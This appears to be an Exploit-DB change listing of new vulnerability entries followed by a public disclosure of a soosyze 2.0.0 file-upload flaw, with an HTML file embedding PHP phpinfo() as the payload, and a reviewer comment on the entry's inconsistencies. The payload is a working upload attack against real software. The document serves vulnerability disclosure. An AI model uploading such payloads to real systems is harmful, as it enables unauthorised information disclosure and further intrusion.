
16 changes to exploits/shellcodes/ghdb

Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities
Axigen < 10.3.3.47_ 10.2.3.12 - Reflected XSS
Drupal 10.1.2 - web-cache-poisoning-External-service-interaction
Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure
soosyze 2.0.0 - File Upload
SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection
Wordpress Plugin Elementor 3.5.5 - Iframe Injection
Wp2Fac - OS Command Injection
Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)
SyncBreeze 15.2.24 - 'login' Denial of Service
GOM Player 2.3.90.5360 - Buffer Overflow (PoC)
GOM Player 2.3.90.5360 - Remote Code Execution (RCE)
Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)
## Title: soosyze 2.0.0 - File Upload
## Author: nu11secur1ty
## Date: 04.26.2023-08.28.2023
## Vendor: https://soosyze.com/
## Software: https://github.com/soosyze/soosyze/releases/tag/2.0.0
## Reference: https://portswigger.net/web-security/file-upload

## Description:
Broken file upload logic. The malicious user can upload whatever he
wants to an HTML file and when he tries to execute it he views almost
all
file paths. This could be worse than ever, it depends on the scenario.

STATUS: HIGH Vulnerability

[+]Exploit:
```HTML
<!DOCTYPE html>
<html>
<head>
<title>Hello broken file upload logic, now I can read your special
directory pats, thank you ;)</title>
</head>
<body>
<h1>
<?php
phpinfo();
?>
</h1>
</body>
</html>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/soosyze/2023/soosyze-2.0.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/05/soosyze-200-file-path-traversal-broken.html)

## Time spend:
01:27:00
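
Review bot: the Description and the payload under "[+]Exploit:" state different impacts, and the entry should say which one applies. The text says the uploader "views almost all file paths", while the payload places `phpinfo();` inside `<?php ... ?>` in a file described as HTML (and fenced as HTML), which only yields output if the server interprets the stored upload as PHP; the entry never says whether that is the application's default behaviour or a property of the test host. The "STATUS: HIGH Vulnerability" line has no scoring or rationale behind it, and nothing records whether versions other than the 2.0.0 release linked under "Software" are affected or whether the vendor has a fix. Smaller points: both links use the label "[href]" instead of naming their target, the title is "File Upload" while the proof URL slug reads "file-path-traversal-broken", and "directory pats" and "Time spend" look like typos.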